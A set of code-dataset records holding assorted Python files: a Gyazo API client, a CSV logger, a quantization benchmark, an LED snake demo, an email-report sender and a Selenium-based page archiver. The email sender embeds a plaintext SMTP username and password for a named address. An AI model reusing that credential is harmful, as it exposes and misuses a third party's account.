(list or dict, optional): A list of trackers or dict or {tracker: tier} pairs.\n Returns:\n str: A magnet uri string.\n \"\"\"\n\n uri = [MAGNET_SCHEME, XT_BTIH_PARAM,\n base64.b32encode(infohash.decode('hex'))]\n if name:\n uri.extend(['&', DN_PARAM, name])\n if trackers:\n try:\n for tracker in sorted(trackers, key=trackers.__getitem__):\n uri.extend(['&', 'tr.%d=' % trackers[tracker], tracker])\n except TypeError:\n for tracker in trackers:\n uri.extend(['&', TR_PARAM, tracker])\n\n return ''.join(uri)\n","sub_path":"clusterautodownloadplugin/tcommon.py","file_name":"tcommon.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"596061716","text":"import pymongo\nimport os\nimport time\nimport datetime\n\nclass csvLogger():\n def __init__(self, header_list, path = None):\n '''\n Ex:\n from altpy.lego.data_logging import csvLogger\n logger = csvLogger(['Voltage','Current'], 'C:\\\\ThisDirectory\\\\')\n logger.writeResultToCsv([5.0, 1.25])\n '''\n\n # Gets time stamp of format 2015-09-01_19-26-32\n time_stamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d_%H-%M-%S')\n # Create csv filename from time_stamp\n filename_str = 'data.csv'\n\n \n if not os.path.isfile(path + filename_str):\n outputFile = open(path + filename_str, \"w\" )\n header_str = \"\"\n for k in header_list:\n header_str += str(k) + \",\"\n outputFile.write( header_str[:-1] + \"\\n\" )\n\n self.logfile_name = path+filename_str\n\n def writeResultToCsv(self, result_list):\n result_str = \"\"\n ## print result_list # for debugging\n for n in result_list:\n n = str(n)\n n = n.replace('\\r', '')\n n = n.replace('\\n', '')\n result_str += str(n) + \",\"\n result_str = result_str[:-1] + \"\\n\"\n\n # open the output file (for appending)\n log_file = open(self.logfile_name, \"a\" )\n log_file.write(result_str)\n # print result_str+'\\n\\n'\n log_file.close()","sub_path":"csv_writer.py","file_name":"csv_writer.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"219489468","text":"import unittest\nfrom pprint import pprint\nfrom scrapy.http.response.text import TextResponse\n\nfrom lmpd.lemon.lemon.spiders.equipment_spider import EquipmentSpider\n\nclass TestEquipmentSpider(unittest.TestCase):\n\n def setUp(self):\n self.spider = EquipmentSpider(limit=1)\n \n self.response = TextResponse(\n url='www.filterunittest.de',\n body=open(f'tmp\\\\filter.equipments.htm', encoding='utf-8').read(),\n encoding = 'utf-8'\n )\n\n def test_parse_equipment(self):\n result = self.spider.parse_equipment(self.response)\n sr = sorted(list(result), key=lambda e: e.get('id'), reverse=False)\n pprint(sr)\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test/test_equipment_spider.py","file_name":"test_equipment_spider.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"450220284","text":"# -*- coding: utf-8 -*-\nimport requests\n\n\nENDPOINT = 'https://api.gyazo.com/api/{}'\nUPLOAD_ENDPOINT = 'https://upload.gyazo.com/api/upload/{}'\n\nIMAGES = ENDPOINT.format('images')\nOEMBED = ENDPOINT.format('oembed')\nUPLOAD = UPLOAD_ENDPOINT.format('')[:-1]\nUPLOAD_WITH_BROWSER_SESSION = UPLOAD_ENDPOINT.format('easy_auth')\n\n\nclass MissingClientID(Exception):\n pass\n\n\nclass InvalidURLFormatError(Exception):\n pass\n\n\nclass Pyazo(object):\n def __init__(self,\n access_token,\n client_id=None,\n client_secret=None):\n self.access_token = access_token\n self.client_id = client_id\n self.client_secret = client_secret\n\n def images(self, page=1, per_page=20):\n query = {\n 'access_token': self.access_token,\n 'page': page,\n 'per_page': per_page\n }\n response = requests.get(IMAGES, data=query)\n return response.text\n\n def upload(self,\n image_path,\n referer_url=None,\n title=None,\n desc=None,\n created_at=None):\n files = {'imagedata': open(image_path, 'rb')}\n payload = {\n 'access_token': self.access_token,\n 'referer_url': referer_url,\n 'title': title,\n 'desc': desc,\n 'created_at': created_at\n }\n response = requests.post(UPLOAD, data=payload, files=files)\n return response.text\n\n def delete(self, image_id):\n payload = {\n 'access_token': self.access_token,\n 'image_id': image_id\n }\n response = requests.delete(IMAGES + '/{}'.format(image_id),\n data=payload)\n return response.text\n\n def oembed(self, url):\n if not url.startswith('http://gyazo.com/'):\n raise InvalidURLFormatError()\n\n query = {'url': url}\n response = requests.get(OEMBED, data=query)\n return response.text\n\n def upload_easy_auth(self, image_url, referer_url, title=None):\n if not self.client_id:\n raise MissingClientID()\n\n payload = {\n 'client_id': self.client_id,\n 'image_url': image_url,\n 'referer_url': referer_url,\n 'title': title\n }\n response = requests.post(UPLOAD_WITH_BROWSER_SESSION, data=payload)\n return response.text\n","sub_path":"pyazo.py","file_name":"pyazo.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"621631644","text":"# 471. Top K Frequent Words\n# Given a list of words and an integer k, return the top k frequent words in the list.\n#\n# Example\n# Given\n#\n# [\n# \"yes\", \"lint\", \"code\",\n# \"yes\", \"code\", \"baby\",\n# \"you\", \"baby\", \"chrome\",\n# \"safari\", \"lint\", \"code\",\n# \"body\", \"lint\", \"code\"\n# ]\n# for k = 3, return [\"code\", \"lint\", \"baby\"].\n#\n# for k = 4, return [\"code\", \"lint\", \"baby\", \"yes\"],\n#\n# Challenge\n# Do it in O(nlogk) time and O(n) extra space.\n\n\nfrom heapq import heappush, heappop\n\nclass Solution:\n \"\"\"\n @param words: an array of string\n @param k: An integer\n @return: an array of string\n \"\"\"\n def topKFrequentWords(self, words, k):\n # write your code here\n \"use hash table for freqency count, then put into min heap,size k. \"\n \"why keep size k? why not put all n nodes into it? since that will make the heap operation time O(log(n)), total would be O(n log(n)). but we need O(n log(k)).\"\n \"we only keep the larget k in heap. when insert into heap, once size > k, poll one(smallest, order would be > k+1, safe to poll). poll all k elements in min heap and get our result\"\n\n \"calculate frequency\"\n\n if words is None:\n return []\n\n if k >= len(words):\n return words\n\n freq = {}\n\n for i in range(len(words)-1,-1,-1):\n if words[i] not in freq.keys():\n freq[words[i]] = 1\n else:\n freq[words[i]] += 1\n\n minheap = []\n\n i = 0\n for key in freq.keys():\n \"we need to push (freq[key],key]) to heap\"\n\n \"push one \"\n\n heappush(minheap,(freq[key],key))\n\n if i>= k:\n \"poll minimum from heap\"\n heappop(minheap)\n\n i += 1\n\n \"now we have top k words in heap, poll out and get result\"\n\n result = []\n\n for i in range(0,len(minheap)):\n result.insert(0,heappop(minheap)[1])\n\n return result\n\n\n\n# input\n# [\"yes\",\"lint\",\"code\",\"yes\",\"code\",\"baby\",\"you\",\"baby\",\"chrome\",\"safari\",\"lint\",\"code\",\"body\",\"lint\",\"code\"]\n# 3\n# Output\n# [\"code\",\"lint\",\"body\"]\n# Expected\n# [\"code\",\"lint\",\"baby\"]\n\nassert Solution().topKFrequentWords([\"yes\",\"lint\",\"code\",\"yes\",\"code\",\"baby\",\"you\",\"baby\",\"chrome\",\"safari\",\"lint\",\"code\",\"body\",\"lint\",\"code\"],3) == [\"code\",\"lint\",\"yes\"]","sub_path":"Algorithm/Python/AdvancedDataStructures/Heap/TopKFrequentWords.py","file_name":"TopKFrequentWords.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"101792127","text":"# coding=<encoding name>= : # coding=utf-8\nimport yagmail\nimport yaml\n\nfrom getpathInfo import text_Path\nfrom text.del_txt import re_nine_city_erro_num\nfrom util.conf_read import ConfRead\n\nclass SendEN:\n def __init__(self, path=text_Path(), name='广州'):\n self.a = path\n self.name = name\n\n def ninety_erro(self):\n with open(self.a + \"ninety_erro.txt\", mode='a+', encoding='utf-8') as f:\n f.seek(0)\n ninety = len(f.readlines())\n if ninety >= 1:\n with open(self.a + \"ninety_erro.txt\", mode='r+', encoding='utf-8') as f:\n return f.readlines(), ninety\n else:\n return ['九十日-接口异常和天数判断-无错误\\n'], 0\n\n def ninety_empty(self):\n with open(self.a + \"ninety_empty.txt\", mode='a+', encoding='utf-8') as f:\n f.seek(0)\n ninety = len(f.readlines())\n if ninety >= 1:\n with open(self.a + \"ninety_empty.txt\", mode='r+', encoding='utf-8') as f:\n return f.readlines(), ninety\n else:\n return ['九十日-字段是否为空-无错误\\n'], 0\n\n def erro_city_num(self):\n with open(self.a + \"nine_erro_citynum.txt\", mode='a+', encoding='utf-8') as f:\n f.seek(0)\n erro_num = len(f.readlines())\n return erro_num\n\n def send_email_nine(self, path=text_Path()):\n e_name = ConfRead.conf_get('email.conf', 'email', 'email')\n e_r_name = yaml.load(e_name, Loader=yaml.FullLoader)\n b1, num_nine1 = self.ninety_erro()\n b1.insert(0, f'【----------九十日-接口异常和天数判断-模块错误----------】[{num_nine1}]\\n')\n b2, num_nine2 = self.ninety_empty()\n b2.insert(0, f'【----------九十日-字段是否为空-模块错误----------】[{num_nine2}]\\n')\n nine = b1 + b2\n nine_num = num_nine1 + num_nine2\n c = ''.join(nine)\n yag = yagmail.SMTP(user=\"lizechen@droi.com\", password=\"a124578\", host='smtp.263.net')\n # 邮箱正文\n\n contents_ninety = c\n\n # file1 = log_path + 'logs.log'\n # 发送邮件\n\n yag.send(e_r_name, f'[vivo]-[{self.name}]-[数据]-[国内站点]-[九十日]-[{self.erro_city_num()}]', contents_ninety)\n re_nine_city_erro_num(path)\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"zuimeiAPI/util/send_email_ninety.py","file_name":"send_email_ninety.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"281681570","text":"def calcular_pagamento(qtd_horas, valor_hora):\r\n horas = float(qtd_horas)\r\n taxa = float(valor_hora)\r\n if horas >= 150:\r\n salario = horas * taxa\r\n else:\r\n h_exc = horas - 150\r\n salario = 150 * taxa + (h_exc*(1.5*taxa))\r\n return salario\r\n\r\n\r\nstr_horas = input(\"Digite a quantidade de horas: \")\r\nstr_taxa = input(\"Digite o valor da hora: \")\r\ntotal_salario = calcular_pagamento(str_horas, str_taxa)\r\nprint(\"O valor de seus rendimentos é R$\", total_salario)\r\n","sub_path":"HorasExtra.py","file_name":"HorasExtra.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"21655816","text":"import numpy as np\nimport torch\nimport torchvision\nfrom timeit import default_timer as timer\nimport torch.quantization\nimport sys\nfrom plot import plot_line_chart\n\n\n# .resnet18() # .mobilenet_v2()\n# model = torch.quantization.quantize_dynamic(original_model, {torch.nn.Linear}, dtype=torch.qint8)\n\ndef run_exp(model):\n print(f\"number of model parameters: {sum([np.prod(p.size()) for p in model.parameters()])}\")\n print(f\"model size: {sys.getsizeof(model)}\")\n # batch_size = 5\n y, x = list(), list()\n for batch_size in [1, 1, 2, 4, 8, 16, 32]:\n dt_list = list()\n num_trials = 10\n for _ in range(num_trials):\n start_time = timer()\n input_batch = torch.rand((batch_size, 3, 224, 224))\n \n if torch.cuda.is_available():\n input_batch = input_batch.to(\"cuda\")\n model.to('cuda')\n # start_time = timer()\n with torch.no_grad():\n output = model(input_batch)\n \n end_time = timer()\n\n dt = end_time - start_time\n dt_list.append(dt / batch_size) \n print(f\"bs: {batch_size} average time: {np.mean(dt_list)} (±{np.std(dt_list)})\")\n y.append(np.mean(dt_list))\n x.append(batch_size)\n return y, x\n\nif __name__ == '__main__':\n model0 = torchvision.models.mobilenet_v2(pretrained=True)\n model0.eval()\n quantized_model0 = torch.quantization.quantize_dynamic(model0, {torch.nn.Linear}, dtype=torch.qint8)\n quantized_model0.eval()\n\n mnet_y, _ = run_exp(model0)\n qmnet_y, _ = run_exp(quantized_model0)\n\n model1 = torchvision.models.resnet18(pretrained=True)\n model1.eval()\n rnet_y, _ = run_exp(model1)\n\n quantized_model1 = torch.quantization.quantize_dynamic(model1, {torch.nn.Linear}, dtype=torch.qint8)\n quantized_model1.eval()\n qrnet_y, _ = run_exp(quantized_model1)\n\n # plot\n all_y = np.asarray([mnet_y, qmnet_y, rnet_y, qrnet_y])\n all_model_names = ['mobilenets_v2 original', 'mobilenets_v2 quantized', \n 'resnet_18 original', 'resnet_18 quantized']\n plot_line_chart(all_y, all_model_names)\n\n","sub_path":"labs/lab3-quantization/feature_extractor_exp.py","file_name":"feature_extractor_exp.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"41982262","text":"from ..ambilight import AmbilightStrip\r\nimport time\r\n\r\n\r\nclass AmbilightStripDemo:\r\n def __init__(self):\r\n self.ambilight_strip = AmbilightStrip()\r\n\r\n def color_snake(self):\r\n snake = AmbilightSnake(self.ambilight_strip)\r\n snake.play()\r\n\r\n\r\nclass AmbilightSnake:\r\n def __init__(self,\r\n strip,\r\n head_color=Color(0, 0, 200),\r\n tail_color=Color(200, 0, 0),\r\n initial_snake_length=5,\r\n growth_rate=1,\r\n movement_size=1,\r\n movement_speed=0.01,\r\n food_per_cycle=17,\r\n food_color=Color(0, 200, 0)):\r\n\r\n self.strip = strip\r\n self.initial_length = initial_snake_length\r\n self.snake_position = initial_snake_length\r\n self.snake_length = initial_snake_length\r\n self.growth_rate = growth_rate\r\n self.movement_size = movement_size\r\n self.movement_speed = movement_speed\r\n self.head_color = head_color\r\n self.tail_color = tail_color\r\n self.food_per_cycle = food_per_cycle\r\n self.food_color = food_color\r\n food_spacing = self.strip.numPixels() / food_per_cycle\r\n self.food_list = []\r\n for food_distance in range(food_per_cycle):\r\n self.food_list.append(food_spacing * food_distance)\r\n\r\n def play(self):\r\n self.render_food()\r\n print('Exit with Ctrl+C')\r\n while True:\r\n self.move_snake()\r\n time.sleep(self.movement_speed)\r\n\r\n def clear_snake(self, color=Color(0, 0, 0)):\r\n self.strip.setPixelColor((self.snake_position - self.snake_length) % self.strip.numPixels(), color)\r\n self.strip.show()\r\n\r\n def render_food(self):\r\n for food_position in self.food_list:\r\n self.strip.setPixelColor(food_position, self.food_color)\r\n self.strip.show()\r\n\r\n def render_snake(self):\r\n for i in range(self.snake_length):\r\n if i == 0:\r\n # draw head\r\n self.strip.setPixelColor((self.snake_position - i) % self.strip.numPixels(), self.head_color)\r\n else:\r\n # draw body\r\n self.strip.setPixelColor((self.snake_position - i) % self.strip.numPixels(), self.tail_color)\r\n self.strip.show()\r\n\r\n def game_over(self, wait_time=1, flash_count=4, flash_color_one=Color(0, 0, 0), flash_color_two=Color(255, 0, 0)):\r\n for i in range(flash_count):\r\n for pixel in range(self.strip.numPixels()):\r\n self.strip.setPixelColor(pixel, flash_color_one if i % 2 == 0 else flash_color_two)\r\n time.sleep(wait_time)\r\n\r\n def move_snake(self):\r\n self.clear_snake()\r\n self.snake_position += self.movement_size\r\n self.snake_position %= self.strip.numPixels()\r\n if self.snake_length == self.strip.numPixels():\r\n self.game_over()\r\n self.snake_length = self.initial_length\r\n if self.snake_position in self.food_list:\r\n self.snake_length += self.growth_rate\r\n self.render_food()\r\n self.render_snake()\r\n","sub_path":"ambilight_strip/ambilight_strip_demo.py","file_name":"ambilight_strip_demo.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"430471433","text":"import base64\nimport datetime\nimport hashlib\nimport os\nfrom datetime import timezone, timedelta, datetime\nimport re\nimport sys\nimport time\nimport json\nfrom pathlib import Path\nfrom urllib.parse import urlparse, urlunsplit, urljoin, quote\n\nimport chromedriver_binary\nimport fire\nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\n\nre_css_url = re.compile(r'(url\\(.*?\\))')\nwebpage2html_cache = {}\ngetting_time = 0\n\n\ndef log(s, new_line=True):\n \"\"\"\n log を標準出力する\n \"\"\"\n print(str(s), end=' ', file=sys.stderr)\n if new_line:\n sys.stderr.write('\\n')\n sys.stderr.flush()\n\n\ndef prepare_download() -> str:\n \"\"\"\n ダウンロードのディレクトリの準備\n \"\"\"\n download_dir_name = 'download'\n download_dir_path = Path(download_dir_name)\n download_dir_path.mkdir(parents=True, exist_ok=True)\n\n download_dir_path_html = download_dir_path / \"html\"\n download_dir_path_html.mkdir(parents=True, exist_ok=True)\n download_dir_path_image = download_dir_path / \"image\"\n download_dir_path_image.mkdir(parents=True, exist_ok=True)\n download_dir_path_link = download_dir_path / \"link\"\n download_dir_path_link.mkdir(parents=True, exist_ok=True)\n\n download_dir_str = str(download_dir_path.resolve())\n return download_dir_str\n\n\ndef make_site_id(url: str = \"\") -> str:\n \"\"\"\n ダウンロードのディレクトリの準備\n\n Args:\n url (str): URL\n \"\"\"\n\n result = hashlib.sha256(url.encode()).digest()\n # log(type(result))\n hash_str = base64.b32encode(result).decode(\"utf8\")\n return hash_str\n\n\ndownload_dir = prepare_download()\nsite_id = \"\"\nexternal_links = []\ninternal_links = []\nbase_url = \"\"\nuser_agent = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:75.0) Gecko/20100101 Firefox/75.0\"\n\n\ndef add_links(url: str = \"\") -> None:\n \"\"\"\n リンクを外部と内部を分けて,リストにURLを追加する\n\n Args:\n url (str): target URL\n \"\"\"\n global external_links\n global internal_links\n global base_url\n\n if url.lower().startswith('http'):\n if url.count(\"/\") < 3 and base_url.startswith(url.split(\"?\")[0]):\n internal_links.append(url)\n elif url.count(\"/\") < 3:\n external_links.append(url)\n elif url.split(\"/\")[2] == base_url.split(\"/\")[2]:\n internal_links.append(url)\n else:\n external_links.append(url)\n\n\ndef absurl(index, relpath: str = None, normpath: str = None):\n if normpath is None:\n normpath = lambda x: x\n if index.lower().startswith('http') or (relpath and relpath.startswith('http')):\n new = urlparse(urljoin(index, relpath))\n return urlunsplit((new.scheme, new.netloc, normpath(new.path), new.query, ''))\n else:\n if relpath:\n return normpath(os.path.join(os.path.dirname(index), relpath))\n else:\n return index\n\n\ndef get_contents(url: str = None, relpath: str = None, verbose: bool = True, usecache: bool = True,\n verify: bool = True, ignore_error: bool = False, username: str = None,\n password: str = None, referer_url: str = \"\"):\n \"\"\"\n Webコンテンツを取得する\n\n Args:\n url:\n relpath:\n verbose:\n usecache:\n verify:\n ignore_error:\n username:\n password:\n referer_url:\n\n Returns:\n\n \"\"\"\n\n global webpage2html_cache\n global site_id\n global download_dir\n global user_agent\n\n if url.startswith('http') or (relpath and relpath.startswith('http')):\n full_path = absurl(url, relpath)\n if not full_path:\n if verbose:\n log(f'[ WARN ] invalid path, {url} {relpath}')\n return '', None\n # urllib2 only accepts valid url, the following code is taken from urllib\n # http://svn.python.org/view/python/trunk/Lib/urllib.py?r1=71780&r2=71779&pathrev=71780\n full_path = quote(full_path, safe=\"%/:=&?~#+!$,;'@()*[]\")\n if usecache:\n if full_path in webpage2html_cache:\n if verbose:\n log(f'[ CACHE HIT ] - {full_path}')\n return webpage2html_cache[full_path], None\n headers = {\n \"accept\": \"image/webp,image/*,*/*;q=0.8\",\n \"accept-language\": \"ja,en-US;q=0.9,en;q=0.8\",\n \"user-agent\": user_agent\n }\n if referer_url is not None and referer_url != \"\":\n headers.update({\"referer\": referer_url})\n\n auth = None\n if username and password:\n auth = requests.auth.HTTPBasicAuth(username, password)\n try:\n response = requests.get(full_path, headers=headers, verify=verify, auth=auth)\n if verbose:\n log('[ GET ] %d - %s' % (response.status_code, response.url))\n if not ignore_error and (response.status_code >= 400 or response.status_code < 200):\n content = ''\n elif response.headers.get('content-type', '').lower().startswith('text/'):\n content = response.text\n else:\n content = response.content\n if usecache:\n webpage2html_cache[response.url] = content\n return content, {'url': response.url,\n 'content-type': response.headers.get('content-type')}\n except Exception as ex:\n if verbose:\n log(f'[ WARN ] ??? - {full_path}: {ex}')\n return '', None\n elif os.path.exists(url):\n if relpath:\n relpath = relpath.split('#')[0].split('?')[0]\n if os.path.exists(relpath):\n full_path = relpath\n else:\n full_path = os.path.normpath(os.path.join(os.path.dirname(url), relpath))\n try:\n ret = open(full_path, 'rb').read()\n if verbose:\n log(f'[ LOCAL ] found - {full_path}')\n return ret, None\n except IOError as ex:\n if verbose:\n msg = str(ex)\n log(f'[ WARN ] file not found - {full_path} {msg}')\n return '', None\n else:\n try:\n ret = open(url, 'rb').read()\n if verbose:\n log(f'[ LOCAL ] found - {url}')\n return ret, None\n except IOError as err:\n if verbose:\n msg = str(err)\n log(f'[ WARN ] file not found - {url} {msg}')\n return '', None\n else:\n if verbose:\n log(f'[ ERROR ] invalid index - {url}')\n return '', None\n\n\ndef get_contents_by_selenium(url: str = None,\n relpath: str = None,\n verbose: bool = True,\n usecache: bool = True,\n verify: bool = True,\n ignore_error: bool = False,\n username: str = None,\n password: str = None,\n flg_screen_shot: bool = False,\n referer_url: str = \"\") -> tuple:\n \"\"\"\n Selenium を利用して,Webコンテンツを取得する\n\n Args:\n url:\n relpath:\n verbose:\n usecache:\n verify:\n ignore_error:\n username:\n password:\n flg_screen_shot:\n referer_url:\n\n Returns:\n\n \"\"\"\n\n global site_id\n global download_dir\n global webpage2html_cache\n global user_agent\n global getting_time\n\n url = absurl(url, base_url)\n full_path = quote(url, safe=\"%/:=&?~#+!$,;'@()*[]\")\n if usecache:\n if full_path in webpage2html_cache:\n if verbose:\n log(f'[ CACHE HIT ] - {full_path}')\n return webpage2html_cache[full_path], {'url': url, 'content-type': \"text/html\"}\n\n if not url.startswith(\"http\"):\n if usecache:\n contents = \"<!DOCTYPE html><html lang='en'>\" \\\n \"<head><meta charset='utf-8'><title>No title\" \\\n \"\"\n webpage2html_cache[full_path] = contents\n return contents, {'url': url, 'content-type': \"text/html\"}\n\n log(f\"[DEBUG] - Get by selenium: {url} as {site_id}\")\n options = webdriver.ChromeOptions()\n options.add_argument('--headless')\n options.add_argument(\"--incognito\")\n options.add_argument(\"--hide-scrollbars\")\n options.add_argument(\"--test-type\")\n\n if not chromedriver_binary:\n return get_contents(url, referer_url=referer_url)\n try:\n with webdriver.Chrome(options=options) as driver:\n try:\n user_agent = driver.execute_script(\"return navigator.userAgent;\")\n driver.set_window_size(1920, 1080)\n driver.get(url)\n if flg_screen_shot:\n width = driver.execute_script(\"return document.body.clientWidth;\")\n driver.set_window_size(max(width, 1920), 1080)\n time.sleep(1)\n height = driver.execute_script(\"\"\"\n var maxHeight = document.body.clientHeight;\n var childrenNodes = document.body.children;\n for (const num in childrenNodes) {\n if (! isNaN(childrenNodes[num].clientHeight)){\n if (childrenNodes[num].clientHeight >maxHeight)\n {maxHeight = childrenNodes[num].clientHeight;}\n }\n };\n return maxHeight;\"\"\")\n # log(height)\n driver.set_window_size(max(width, 1920), max(height, 1080))\n time.sleep(1)\n driver.execute_script(f\"window.scrollTo(0, {height})\")\n time.sleep(12)\n driver.execute_script(\"window.scrollTo(0, 0)\")\n time.sleep(1)\n html_text = driver.page_source\n driver.save_screenshot(f'{download_dir}/image/{site_id}_{getting_time}.png')\n except TimeoutException as ex:\n log(f\"[ERROR]\\tTimeoutException: '{ex}'\")\n html_text = \"\" \\\n \"No title\" \\\n \"\"\n else:\n driver.quit()\n except Exception as ex:\n log(f\"[ERROR]\\twebdriver Chrome: '{ex}'\")\n log(f\"[WARN]\\tGet web page by request without screenshot\")\n return get_contents(url, referer_url=referer_url)\n\n # キャッシュが有効な場合,キャッシュに追加.\n if usecache:\n webpage2html_cache[full_path] = html_text\n\n return html_text, {'url': url, 'content-type': \"text/html\"}\n\n\ndef data_to_base64(index, src, verbose: bool = True, referer_url: str = None):\n # doc here: http://en.wikipedia.org/wiki/Data_URI_scheme\n sp = urlparse(src).path.lower()\n if src.strip().startswith('data:'):\n return src\n elif src.strip().startswith('javascript:'):\n return src\n\n if sp.endswith('.png'):\n fmt = 'image/png'\n elif sp.endswith('.gif'):\n fmt = 'image/gif'\n elif sp.endswith('.ico'):\n fmt = 'image/x-icon'\n elif sp.endswith('.jpg') or sp.endswith('.jpeg'):\n fmt = 'image/jpeg'\n elif sp.endswith('.webp'):\n fmt = 'image/webp'\n elif sp.endswith('.svg'):\n fmt = 'image/svg+xml'\n elif sp.endswith('.ttf'):\n fmt = 'application/x-font-ttf'\n elif sp.endswith('.otf'):\n fmt = 'application/x-font-opentype'\n elif sp.endswith('.woff'):\n fmt = 'application/font-woff'\n elif sp.endswith('.woff2'):\n fmt = 'application/font-woff2'\n elif sp.endswith('.eot'):\n fmt = 'application/vnd.ms-fontobject'\n elif sp.endswith('.sfnt'):\n fmt = 'application/font-sfnt'\n elif sp.endswith('.css') or sp.endswith('.less') or src.startswith(\"https://fonts.googleapis.com/css\"):\n fmt = 'text/css'\n elif sp.endswith('.js'):\n fmt = 'application/javascript'\n elif sp.endswith(\".html\") or sp.endswith(\".htm\"):\n fmt = \"text/html\"\n elif sp.endswith(\".txt\") or sp.endswith(\".md\"):\n fmt = \"text/text\"\n elif sp.endswith(\".json\"):\n fmt = \"application/json\"\n else:\n fmt = 'image/png'\n\n # html ファイルの場合 Selenium を利用して取得する.それ以外は,referer をつけて Requestsを利用する.\n if fmt == \"text/html\":\n data, extra_data = get_contents_by_selenium(index, src, referer_url=referer_url)\n else:\n # log(f\"{index} , {sp} <- {src} as {fmt}\")\n data, extra_data = get_contents(index, src, verbose=verbose, referer_url=referer_url)\n\n if extra_data and extra_data.get('content-type'):\n fmt = extra_data.get('content-type').strip().replace(' ', '')\n\n if data:\n # log(f\"{index}, {fmt}, {type(data)}\")\n if isinstance(data, bytes):\n # return f'data:{fmt};base64,' + bytes.decode(base64.b64encode(data))\n return f'data:{fmt};base64,{base64.b64encode(data).decode(\"utf-8\")}'\n else:\n return f'data:{fmt};base64,{base64.b64encode(str.encode(data)).decode(\"utf-8\")}'\n else:\n return absurl(index, src)\n\n\ncss_encoding_re = re.compile(r'''@charset\\s+[\"']([-_a-zA-Z0-9]+)[\"'];''', re.I)\n\n\ndef handle_css_content(index, css, verbose=True, referer_url: str = None):\n if not css:\n return css\n if not isinstance(css, str):\n css = bytes.decode(css)\n mo = css_encoding_re.search(css)\n if mo:\n try:\n css = css.decode(mo.group(1))\n except Exception as ex:\n log(f'[WARN]\\tfailed to convert css to encoding {mo.group(1)}: {ex}')\n # Watch out! how to handle urls which contain parentheses inside? Oh god, css does not support such kind of urls\n # I tested such url in css, and, unfortunately, the css rule is broken. LOL!\n # I have to say that, CSS is awesome!\n reg = re.compile(r'url\\s*\\((.+?)\\)')\n\n def repl(matchobj) -> str:\n src = matchobj.group(1).strip(' \\'\"')\n # if src.lower().endswith('woff') or src.lower().endswith('ttf') \\\n # or src.lower().endswith('otf') or src.lower().endswith('eot'):\n # # dont handle font data uri currently\n # return 'url(' + src + ')'\n base64_str = data_to_base64(index, src, verbose=verbose, referer_url=referer_url)\n return f'url(\"{base64_str}\")'\n\n css = reg.sub(repl, css)\n return css\n\n\ndef generate(url,\n verbose=True,\n comment=True,\n keep_script=False,\n prettify=False,\n full_url=True,\n verify=True,\n errorpage=False,\n username=None, password=None,\n level: int = 1,\n **kwargs):\n \"\"\"\n given a index url such as http://www.google.com, http://custom.domain/index.html\n return generated single html\n \"\"\"\n\n global site_id\n global base_url\n global getting_time\n\n if level <= 1:\n base_url = url\n site_id = make_site_id(url)\n\n # html_doc, extra_data = get(index, verbose=verbose, verify=verify, ignore_error=errorpage,\n # username=username, password=password)\n #\n # if extra_data and extra_data.get('url'):\n # index = extra_data['url']\n\n html_doc, _ = get_contents_by_selenium(url, flg_screen_shot=True)\n referer_url = url\n\n # now build the dom tree\n # soup = BeautifulSoup(html_doc, 'lxml')\n soup = BeautifulSoup(html_doc, 'html5lib')\n soup_title = soup.title.string if soup.title else ''\n log(f\"[ INFO ] get {soup_title}\")\n\n for link in soup('link'):\n if link.get('href'):\n # add_links(absurl(url, link['href']))\n if 'mask-icon' in (link.get('rel') or []) or \\\n 'icon' in (link.get('rel') or []) or \\\n 'apple-touch-icon' in (link.get('rel') or []) or \\\n 'apple-touch-icon-precomposed' in (link.get('rel') or []):\n link['data-href'] = link['href']\n link['href'] = data_to_base64(url, link['href'], verbose=verbose)\n elif link.get('type') == 'text/css' or \\\n link['href'].lower().endswith('.css') or \\\n 'stylesheet' in (link.get('rel') or []):\n new_type = 'text/css' if not link.get('type') else link['type']\n css = soup.new_tag('style', type=new_type)\n css['data-href'] = link['href']\n for attr in link.attrs:\n if attr in ['href']:\n continue\n css[attr] = link[attr]\n\n css_data, _ = get_contents(url,\n relpath=link['href'],\n verbose=verbose,\n referer_url=referer_url)\n\n new_css_content = handle_css_content(absurl(url, link['href']),\n css_data,\n verbose=verbose,\n referer_url=referer_url)\n # if \"stylesheet/less\" in '\\n'.join(link.get('rel') or []).lower():\n # fix browser side less: http://lesscss.org/#client-side-usage\n # # link['href'] = 'data:text/less;base64,' + base64.b64encode(css_data)\n # link['data-href'] = link['href']\n # link['href'] = absurl(index, link['href'])\n if False: # new_css_content.find('@font-face') > -1 or new_css_content.find('@FONT-FACE') > -1:\n link['href'] = 'data:text/css;base64,' + base64.b64encode(new_css_content)\n else:\n css.string = new_css_content\n link.replace_with(css)\n elif full_url:\n link['data-href'] = link['href']\n link['href'] = absurl(url, link['href'])\n\n # Javascript を抜き出す\n for js in soup('script'):\n if not keep_script:\n js.replace_with('')\n continue\n if not js.get('src'):\n continue\n new_type = 'text/javascript' if not js.has_attr('type') or not js['type'] else js['type']\n code = soup.new_tag('script', type=new_type)\n code['data-src'] = js['src']\n js_str, _ = get_contents(url, relpath=js['src'], verbose=verbose, 